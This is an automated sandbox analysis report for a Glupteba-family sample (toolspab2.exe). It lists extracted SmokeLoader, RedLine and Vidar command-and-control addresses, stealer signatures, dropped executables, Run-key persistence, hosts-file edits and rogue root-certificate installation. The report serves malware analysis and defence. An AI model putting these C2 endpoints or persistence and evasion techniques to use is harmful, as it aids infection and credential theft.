glupteba | 4a0ecbcf9b54ed1c9654eb9ee214a797f48c980c6d03a261f62fa9671a2733d6

Resubmissions

08-07-2021 12:04

210708-6t44391t1a 10

08-07-2021 11:49

210708-pee12pcw62 10

Analysis

max time kernel
140s
max time network
162s
platform
windows10_x64
resource
win10v20210408
submitted
08-07-2021 11:49

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

toolspab2.exe
Size

315KB
MD5

585c257e0b345b762e7cdc407d8f9da2
SHA1

ffee403d97b76c3460fc166b9d5ce1205cd216a5
SHA256

4a0ecbcf9b54ed1c9654eb9ee214a797f48c980c6d03a261f62fa9671a2733d6
SHA512

14d39a6cd1c6d912cae7c35e2a98affcd5a9c1df6b947c42de65344e08d34912b09ccac83f9d8c3213b4e3d555769801e8218cb3f4b970d1d08606ee5a454ba8

Malware Config

Extracted

Family

smokeloader

Version

2020

http://999080321newfolder1002002131-service1002.space/

http://999080321newfolder1002002231-service1002.space/

http://999080321newfolder3100231-service1002.space/

http://999080321newfolder1002002431-service1002.space/

http://999080321newfolder1002002531-service1002.space/

http://999080321newfolder33417-012425999080321.space/

http://999080321test125831-service10020125999080321.space/

http://999080321test136831-service10020125999080321.space/

http://999080321test147831-service10020125999080321.space/

http://999080321test146831-service10020125999080321.space/

http://999080321test134831-service10020125999080321.space/

http://999080321est213531-service1002012425999080321.ru/

http://999080321yes1t3481-service10020125999080321.ru/

http://999080321test13561-service10020125999080321.su/

http://999080321test14781-service10020125999080321.info/

http://999080321test13461-service10020125999080321.net/

http://999080321test15671-service10020125999080321.tech/

http://999080321test12671-service10020125999080321.online/

http://999080321utest1341-service10020125999080321.ru/

http://999080321uest71-service100201dom25999080321.ru/

rc4.i32

Extracted

Family

redline

Botnet

Seryi

185.203.243.131:27365

Extracted

Family

vidar

Version

39.4

Botnet

824

https://sergeevih43.tumblr.com

Attributes

profile_id
824

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

vidar

Version

39.4

Botnet

517

https://sergeevih43.tumblr.com

Attributes

profile_id
517

Extracted

Family

redline

Botnet

BtcOnly

185.53.46.82:3214

Signatures

Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba Payload 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/4484-312-0x0000000002E40000-0x0000000003766000-memory.dmp	family_glupteba
behavioral2/memory/4484-313-0x0000000000400000-0x0000000000D41000-memory.dmp	family_glupteba

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.

Processes:

rUNdlL32.eXe

description pid pid_target process target process

Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1328 4404 rUNdlL32.eXe
Raccoon
Simple but powerful infostealer which was very active in 2019.
stealer raccoon
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1328	4404	rUNdlL32.eXe

RedLine Payload 4 IoCs

Processes:

resource	yara_rule
behavioral2/memory/1580-154-0x0000000000400000-0x000000000041E000-memory.dmp	family_redline
behavioral2/memory/1580-155-0x0000000000417EAA-mapping.dmp	family_redline
behavioral2/memory/632-335-0x0000000002140000-0x000000000215B000-memory.dmp	family_redline
behavioral2/memory/632-337-0x00000000049B0000-0x00000000049C9000-memory.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

svchost.exe

description pid process target process

PID 1872 created 4484 1872 svchost.exe 2061.exe
Tofsee
Backdoor/botnet which carries out malicious activities based on commands from a C2 server.
trojan tofsee
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Windows security bypass 2 TTPs
evasion trojan

Disabling Security Tools
T1089

Modify Registry
T1112

description	pid	process	target process
PID 1872 created 4484	1872	svchost.exe	2061.exe

Vidar Stealer 6 IoCs

stealer

Processes:

resource	yara_rule
behavioral2/memory/3872-231-0x0000000001FC0000-0x000000000205D000-memory.dmp	family_vidar
behavioral2/memory/3872-232-0x0000000000400000-0x00000000004AD000-memory.dmp	family_vidar
behavioral2/memory/3912-316-0x0000000002160000-0x00000000021FE000-memory.dmp	family_vidar
behavioral2/memory/4580-318-0x0000000000400000-0x00000000004A1000-memory.dmp	family_vidar
behavioral2/memory/4580-320-0x000000000046B76D-mapping.dmp	family_vidar
behavioral2/memory/4580-326-0x0000000000400000-0x00000000004A1000-memory.dmp	family_vidar

Creates new service(s) 1 TTPs
persistence

New Service
T1050
Downloads MZ/PE file
Drops file in Drivers directory 1 IoCs

Processes:

134 Vaporeondè_éçè_)))_.exe

description ioc process

File opened for modification C:\Windows\system32\drivers\etc\hosts 134 Vaporeondè_éçè_)))_.exe

description	ioc	process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	134 Vaporeondè_éçè_)))_.exe

Executes dropped EXE 33 IoCs

Processes:

FD22.exeFEE8.exe540E.exe58E2.exe5D19.exe66AF.exe540E.exe6D28.exe540E.exeDAC8.exeDC01.exeE029.exeXrZhy2.eXeDAC8.exeDAC8.exeFE60.exe45.exe45.tmp134 Vaporeondè_éçè_)))_.exeDAC8.exe2061.exebuild2.exe2583.exe3718.exe4820.exebuild2.exeeqputlju.exe2061.exeirecord.exeirecord.tmpDahanoqehe.exeI-Record.exeBejymaepaho.exe

pid	process
4264	FD22.exe
4124	FEE8.exe
576	540E.exe
964	58E2.exe
1216	5D19.exe
1436	66AF.exe
1432	540E.exe
1688	6D28.exe
1580	540E.exe
4324	DAC8.exe
3872	DC01.exe
4468	E029.exe
2132	XrZhy2.eXe
4564	DAC8.exe
4948	DAC8.exe
1240	FE60.exe
2008	45.exe
4924	45.tmp
2688	134 Vaporeondè_éçè_)))_.exe
4452	DAC8.exe
4484	2061.exe
3912	build2.exe
1124	2583.exe
4280	3718.exe
632	4820.exe
4580	build2.exe
3948	eqputlju.exe
1076	2061.exe
1528	irecord.exe
4564	irecord.tmp
1060	Dahanoqehe.exe
2724	I-Record.exe
2184	Bejymaepaho.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Sets service image path in registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

VMProtect packed file 3 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\FE60.exe	vmprotect
C:\Users\Admin\AppData\Local\Temp\FE60.exe	vmprotect
behavioral2/memory/1240-261-0x0000000000400000-0x0000000000664000-memory.dmp	vmprotect

Deletes itself 1 IoCs

Processes:

pid process

3048

pid	process
3048

Loads dropped DLL 22 IoCs

Processes:

toolspab2.exe6D28.exe58E2.exeregsvr32.exeDC01.exe45.tmpbuild2.exeI-Record.exe

pid	process
3320	toolspab2.exe
1688	6D28.exe
964	58E2.exe
964	58E2.exe
964	58E2.exe
964	58E2.exe
964	58E2.exe
1432	regsvr32.exe
1432	regsvr32.exe
3872	DC01.exe
3872	DC01.exe
4924	45.tmp
4580	build2.exe
4580	build2.exe
2724	I-Record.exe
2724	I-Record.exe
2724	I-Record.exe
2724	I-Record.exe
2724	I-Record.exe
2724	I-Record.exe
2724	I-Record.exe
2724	I-Record.exe

Modifies file permissions 1 TTPs 1 IoCs
discovery

File Permissions Modification
T1222

Processes:

icacls.exe

pid process

3320 icacls.exe
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses 2FA software files, possible credential harvesting 2 TTPs
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

pid	process
3320	icacls.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

DAC8.exe134 Vaporeondè_éçè_)))_.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\4d2337ac-5d0a-444d-97e8-3ed4d56f35a9\\DAC8.exe\" --AutoStart"	DAC8.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Windows Mail\\Poqutoborae.exe\""	134 Vaporeondè_éçè_)))_.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

FE60.exe

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA FE60.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

113 api.2ip.ua
114 api.2ip.ua
137 api.2ip.ua
206 ipinfo.io
208 ipinfo.io
Drops file in System32 directory 1 IoCs

Processes:

svchost.exe

description ioc process

File created C:\Windows\SysWOW64\config\systemprofile:.repos svchost.exe
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

Processes:

regsvr32.exe

pid process

1432 regsvr32.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	FE60.exe

flow	ioc
113	api.2ip.ua
114	api.2ip.ua
137	api.2ip.ua
206	ipinfo.io
208	ipinfo.io

description	ioc	process
File created	C:\Windows\SysWOW64\config\systemprofile:.repos	svchost.exe

pid	process
1432	regsvr32.exe

Suspicious use of SetThreadContext 6 IoCs

Processes:

toolspab2.exe540E.exeDAC8.exeDAC8.exebuild2.exeeqputlju.exe

description	pid	process	target process
PID 4648 set thread context of 3320	4648	toolspab2.exe	toolspab2.exe
PID 576 set thread context of 1580	576	540E.exe	540E.exe
PID 4324 set thread context of 4564	4324	DAC8.exe	DAC8.exe
PID 4948 set thread context of 4452	4948	DAC8.exe	DAC8.exe
PID 3912 set thread context of 4580	3912	build2.exe	build2.exe
PID 3948 set thread context of 2344	3948	eqputlju.exe	svchost.exe

Drops file in Program Files directory 30 IoCs

Processes:

134 Vaporeondè_éçè_)))_.exeirecord.tmp

description	ioc	process
File created	C:\Program Files\Windows Photo Viewer\GMKQBZCYKT\irecord.exe	134 Vaporeondè_éçè_)))_.exe
File created	C:\Program Files (x86)\i-record\is-DCFEV.tmp	irecord.tmp
File created	C:\Program Files (x86)\i-record\is-OTUCO.tmp	irecord.tmp
File created	C:\Program Files (x86)\i-record\is-E9C9U.tmp	irecord.tmp
File opened for modification	C:\Program Files (x86)\i-record\I-Record.exe	irecord.tmp
File opened for modification	C:\Program Files (x86)\i-record\AForge.Video.FFMPEG.dll	irecord.tmp
File opened for modification	C:\Program Files (x86)\i-record\avformat-53.dll	irecord.tmp
File created	C:\Program Files (x86)\i-record\is-31VJC.tmp	irecord.tmp
File created	C:\Program Files (x86)\i-record\is-KHUUQ.tmp	irecord.tmp
File created	C:\Program Files (x86)\Windows Mail\Poqutoborae.exe	134 Vaporeondè_éçè_)))_.exe
File created	C:\Program Files\Windows Photo Viewer\GMKQBZCYKT\irecord.exe.config	134 Vaporeondè_éçè_)))_.exe
File opened for modification	C:\Program Files (x86)\i-record\avdevice-53.dll	irecord.tmp
File opened for modification	C:\Program Files (x86)\i-record\avfilter-2.dll	irecord.tmp
File opened for modification	C:\Program Files (x86)\i-record\swscale-2.dll	irecord.tmp
File created	C:\Program Files (x86)\i-record\unins000.dat	irecord.tmp
File created	C:\Program Files (x86)\i-record\is-88L2U.tmp	irecord.tmp
File created	C:\Program Files (x86)\i-record\is-JACQG.tmp	irecord.tmp
File opened for modification	C:\Program Files (x86)\i-record\unins000.dat	irecord.tmp
File created	C:\Program Files (x86)\i-record\is-QNEF6.tmp	irecord.tmp
File created	C:\Program Files (x86)\i-record\is-LHLFT.tmp	irecord.tmp
File opened for modification	C:\Program Files (x86)\i-record\AForge.Video.dll	irecord.tmp
File opened for modification	C:\Program Files (x86)\i-record\avutil-51.dll	irecord.tmp
File opened for modification	C:\Program Files (x86)\i-record\swresample-0.dll	irecord.tmp
File created	C:\Program Files (x86)\i-record\is-NO90O.tmp	irecord.tmp
File created	C:\Program Files (x86)\i-record\is-D18BS.tmp	irecord.tmp
File opened for modification	C:\Program Files (x86)\i-record\avcodec-53.dll	irecord.tmp
File opened for modification	C:\Program Files (x86)\i-record\postproc-52.dll	irecord.tmp
File created	C:\Program Files (x86)\i-record\is-IDIVD.tmp	irecord.tmp
File created	C:\Program Files (x86)\Windows Mail\Poqutoborae.exe.config	134 Vaporeondè_éçè_)))_.exe
File created	C:\Program Files (x86)\i-record\is-0J23U.tmp	irecord.tmp

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

toolspab2.exe6D28.exe

description	ioc	process
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspab2.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspab2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	6D28.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	6D28.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	6D28.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspab2.exe

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

build2.exeDC01.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	build2.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	DC01.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	DC01.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	build2.exe

Delays execution with timeout.exe 2 IoCs
evasion

Processes:

timeout.exetimeout.exe

pid process

3164 timeout.exe
3132 timeout.exe
Kills process with taskkill 4 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

4732 taskkill.exe
4332 taskkill.exe
2208 taskkill.exe
936 taskkill.exe

pid	process
3164	timeout.exe
3132	timeout.exe

pid	process
4732	taskkill.exe
4332	taskkill.exe
2208	taskkill.exe
936	taskkill.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

2061.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-191 = "Mountain Daylight Time"	2061.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-211 = "Pacific Daylight Time"	2061.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-831 = "SA Eastern Daylight Time"	2061.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2141 = "Transbaikal Daylight Time"	2061.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-351 = "FLE Daylight Time"	2061.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2181 = "Astrakhan Daylight Time"	2061.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1831 = "Russia TZ 2 Daylight Time"	2061.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-342 = "Egypt Standard Time"	2061.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2791 = "Novosibirsk Daylight Time"	2061.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-961 = "Paraguay Daylight Time"	2061.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2162 = "Altai Standard Time"	2061.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-672 = "AUS Eastern Standard Time"	2061.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-171 = "Central Daylight Time (Mexico)"	2061.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-251 = "Dateline Daylight Time"	2061.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-382 = "South Africa Standard Time"	2061.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2591 = "Tocantins Daylight Time"	2061.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-931 = "Coordinated Universal Time"	2061.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-232 = "Hawaiian Standard Time"	2061.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-182 = "Mountain Standard Time (Mexico)"	2061.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-214 = "Pacific Daylight Time (Mexico)"	2061.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-302 = "Romance Standard Time"	2061.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	2061.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1822 = "Russia TZ 1 Standard Time"	2061.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2322 = "Sakhalin Standard Time"	2061.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	2061.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	2061.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2512 = "Lord Howe Standard Time"	2061.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1021 = "Bangladesh Daylight Time"	2061.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-151 = "Central America Daylight Time"	2061.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-112 = "Eastern Standard Time"	2061.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-181 = "Mountain Daylight Time (Mexico)"	2061.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-732 = "Fiji Standard Time"	2061.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-911 = "Mauritius Daylight Time"	2061.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time"	2061.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-192 = "Mountain Standard Time"	2061.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	2061.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	2061.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	2061.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-842 = "Argentina Standard Time"	2061.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-962 = "Paraguay Standard Time"	2061.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-632 = "Tokyo Standard Time"	2061.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-561 = "SE Asia Daylight Time"	2061.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-601 = "Taipei Daylight Time"	2061.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-452 = "Caucasus Standard Time"	2061.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2531 = "Chatham Islands Daylight Time"	2061.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-262 = "GMT Standard Time"	2061.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1872 = "Russia TZ 7 Standard Time"	2061.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-621 = "Korea Daylight Time"	2061.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-32 = "Mid-Atlantic Standard Time"	2061.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-501 = "Nepal Daylight Time"	2061.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	2061.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	2061.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-491 = "India Daylight Time"	2061.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1821 = "Russia TZ 1 Daylight Time"	2061.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2841 = "Saratov Daylight Time"	2061.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2752 = "Tomsk Standard Time"	2061.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1502 = "Turkey Standard Time"	2061.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1501 = "Turkey Daylight Time"	2061.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2391 = "Aleutian Daylight Time"	2061.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-81 = "Atlantic Daylight Time"	2061.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-671 = "AUS Eastern Daylight Time"	2061.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-332 = "E. Europe Standard Time"	2061.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2571 = "Turks and Caicos Daylight Time"	2061.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2611 = "Bougainville Daylight Time"	2061.exe

Modifies registry class 3 IoCs

Processes:

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\SplashScreen
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

DAC8.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	DAC8.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab